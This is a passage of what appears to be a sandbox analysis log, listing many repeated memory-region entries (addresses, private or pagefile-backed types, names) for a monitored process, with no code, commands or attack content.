0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4512 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4513 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4514 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4515 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4516 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4517 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4518 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4519 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4520 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4521 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4522 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4523 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4524 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4525 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4526 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4527 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4528 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4529 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4530 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4531 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4532 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4533 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4534 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4535 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4536 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4537 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4538 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4539 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4540 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4541 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4542 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4543 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4544 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4545 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4546 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4547 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4548 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4549 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4550 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4551 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4552 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4553 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4554 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4555 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4556 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4557 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4558 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4559 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4560 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4561 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4562 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4563 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4564 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4565 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4566 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4567 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4568 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4569 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4570 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4571 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4572 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4573 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4574 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4575 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4576 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4577 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4578 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4579 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4580 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4581 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4582 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4583 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4584 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4585 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4586 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4587 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4588 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4589 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4590 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4591 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4592 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4593 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4594 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4595 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4596 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4597 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4598 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4599 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4600 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4601 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4602 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4603 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4604 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4605 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4606 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4607 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4608 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4609 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4610 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4611 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4612 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4613 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4614 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4615 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4616 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4617 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4618 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4619 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4620 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4621 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4622 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4623 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4624 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4625 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4626 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4627 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4628 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4629 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4630 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4631 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4632 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4633 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4634 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4635 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4636 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4637 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4638 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4639 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4640 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4641 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4642 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4643 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4644 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4645 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4646 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4647 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4648 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4649 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4650 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4651 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4652 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4653 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4654 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4655 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4656 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4657 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4658 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4659 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4660 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4661 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4662 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4663 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4664 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4665 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4666 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4667 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4668 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4669 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4670 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4671 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4672 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4673 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4674 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4675 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4676 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4677 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4678 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4679 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4680 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4681 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4682 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4683 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4684 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4685 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4686 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4687 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4688 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4689 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4690 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4691 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4692 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4693 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4694 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4695 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4696 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4697 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4698 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4699 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4700 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4701 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4702 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4703 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4704 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4705 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4706 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4707 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4708 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4709 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4710 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 